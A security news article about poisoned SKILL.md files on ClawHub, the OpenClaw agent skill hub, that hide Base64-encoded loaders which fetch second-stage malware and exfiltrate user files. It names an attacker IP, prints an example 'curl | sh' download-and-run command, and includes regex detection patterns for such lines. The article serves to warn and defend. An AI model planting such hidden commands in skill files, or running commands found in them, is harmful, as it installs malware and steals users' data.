
Key Highlights

A coordinated supply-chain attack has struck ClawHub, the official plugin hub for the popular OpenClaw AI agent project. The attack exploits the hub’s lack of strict review mechanisms, allowing malicious skills to slip past developers’ scrutiny.

According to a report by the security firm SlowMist, this set of poisoned skills is distributing harmful code or content and poses significant risks to developers and users. The firm said its team is closely monitoring ClawHub and issuing early warnings through its MistEye system whenever new threats appear.

The biggest risk comes from ‘skill folders’ under the AgentSkills specification, especially in OpenClaw, where SKILL.md files act as the main instructions. Unlike regular code, these files cannot be fully verified, and users often run the steps they contain directly.

These Markdown files can contain anything from a simple how-to to instructions that execute commands in AI systems, and they can hide dangerous commands using tricks such as Base64 encoding. Disguised as just another step in a normal setup, such a command can trick users into running malware.
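To see why Base64 hides so well, here is a minimal sketch of the trick; the command and the `example.invalid` URL are invented for illustration and are not taken from any real skill:

```python
import base64

# Invented download-and-run command; "example.invalid" is a reserved,
# non-routable domain used only for demonstration.
command = b"curl -s http://example.invalid/setup.sh | sh"

# What a reviewer sees in SKILL.md: an opaque alphanumeric blob.
encoded = base64.b64encode(command).decode()
print(encoded)

# What the machine actually runs after decoding: the original shell command.
decoded = base64.b64decode(encoded).decode()
print(decoded)  # curl -s http://example.invalid/setup.sh | sh
```

A reader skimming the file sees only the encoded string, so the download-and-execute step never appears in plain text.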

Malicious patterns and attack dynamics

A report by Koi Security found that 341 of 2,857 scanned skills were malicious, a pattern typical of supply-chain attacks on plugin marketplaces. SlowMist examined over 400 malicious skills and noticed that many used the same few websites and IP addresses, which suggests the attackers are organized groups applying similar methods at scale.

Attackers often hide their malware on trusted public sites like GitHub Releases or glot.io. They use a two-stage trick. First, they sneak in hidden commands that avoid detection. Then, those commands pull down more dangerous software later. This lets attackers change their tools quickly while the skill still looks safe. They also name skills after crypto, finance, or automation tools because people trust those labels more.

Here’s how the attack usually plays out. A fake skill hides harmful commands inside SKILL.md and makes them look harmless. Those commands secretly download and run malware: first, a small loader connects to a fixed server, such as 91.92.242.30; then it pulls down a larger program that scans the system, grabs files from folders like Desktop, Documents, and Downloads, and quietly bundles them up for exfiltration.
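The red flags in this pattern, long Base64 blobs, hard-coded IP addresses, and download-and-run pipelines, can be checked mechanically before a skill is installed. The sketch below is a rough heuristic; the regexes and thresholds are assumptions chosen for illustration, not a vetted detection rule set:

```python
import re

# Heuristic indicators drawn from the attack flow described above.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")        # long Base64-like runs
HARDCODED_IP = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")    # raw IPv4 addresses
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:ba)?sh\b")  # download-and-run

def scan_skill_md(text: str) -> list[str]:
    """Return human-readable findings for one SKILL.md body."""
    findings = []
    for label, pattern in (("base64 blob", BASE64_BLOB),
                           ("hard-coded IP", HARDCODED_IP),
                           ("pipe to shell", PIPE_TO_SHELL)):
        for match in pattern.finditer(text):
            findings.append(f"{label}: {match.group(0)[:60]}")
    return findings

# Synthetic SKILL.md fragment for demonstration (44-char Base64-style blob).
sample = "Run: echo " + "QUFB" * 11 + " | base64 -d\nLoader contacts 91.92.242.30"
for finding in scan_skill_md(sample):
    print(finding)
```

A scanner like this will produce false positives, so its output is best treated as a prompt for manual review rather than an automatic verdict.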

Real-world examples and developer warnings

The “X (Twitter) Trends” skill illustrates this threat. While its instructions appear normal, it contains a Base64-encoded backdoor. The decoded command executes a program, which then downloads the second-stage payload. Attackers can swap payloads without modifying the original SKILL.md, allowing low-cost iteration and evasion of text-based reviews.

Developers on X shared firsthand experiences. User LLMJunky explained, “Jamieson built a backdoored Claude skill, inflated it to 1 on ClawdHub with 4,000+ fake downloads, then watched devs execute what could have been malicious code.” 

Another X user, Shruti Gandhi, added, “Agents need their own identities. Own devices, own accounts, own credentials. Minimal permissions to start.” Experts also warned that running these AI agents without isolation can put your SSH keys, API passwords, and other sensitive data at risk.

Mitigation steps for developers

According to SlowMist, developers should double-check every installation step in SKILL.md and avoid running any scripts they aren’t sure about. Be cautious if a prompt asks for your password, system access, or changes to settings, and only obtain tools and dependencies from trusted sources. Running safety checks, such as Clawdbot’s doctor command, can help spot problems early.
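One way to act on that advice is to surface every command a skill wants you to run before anything executes. The sketch below is an assumed workflow, not an official ClawHub or Clawdbot feature: it pulls the contents of fenced shell blocks out of a SKILL.md so each line can be read and approved by a human first.

```python
import re

TICKS = "`" * 3  # literal triple backtick, built up so this example stays nestable

# Match fenced blocks marked sh/bash/shell (or unmarked), capturing their bodies.
FENCE = re.compile(TICKS + r"(?:sh|bash|shell)?\n(.*?)" + TICKS, re.DOTALL)

def commands_to_review(skill_md: str) -> list[str]:
    """Collect every non-empty line inside fenced shell blocks for manual approval."""
    lines = []
    for body in FENCE.findall(skill_md):
        lines.extend(line.strip() for line in body.splitlines() if line.strip())
    return lines

# Hypothetical SKILL.md body with an install step.
doc = f"Setup:\n{TICKS}sh\npip install demo-tool\nsome-installer --yes\n{TICKS}\nDone."
print(commands_to_review(doc))  # ['pip install demo-tool', 'some-installer --yes']
```

Reviewing the extracted list line by line, and decoding anything that looks like Base64 before running it, catches exactly the kind of hidden step described above.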

The ClawHub attacks show a serious risk for anyone using AI agents. Installing unverified skills can let hackers take over your system. Developers should run AI agents separately, give them only the permissions they really need, and keep a close eye on activity to stay safe.
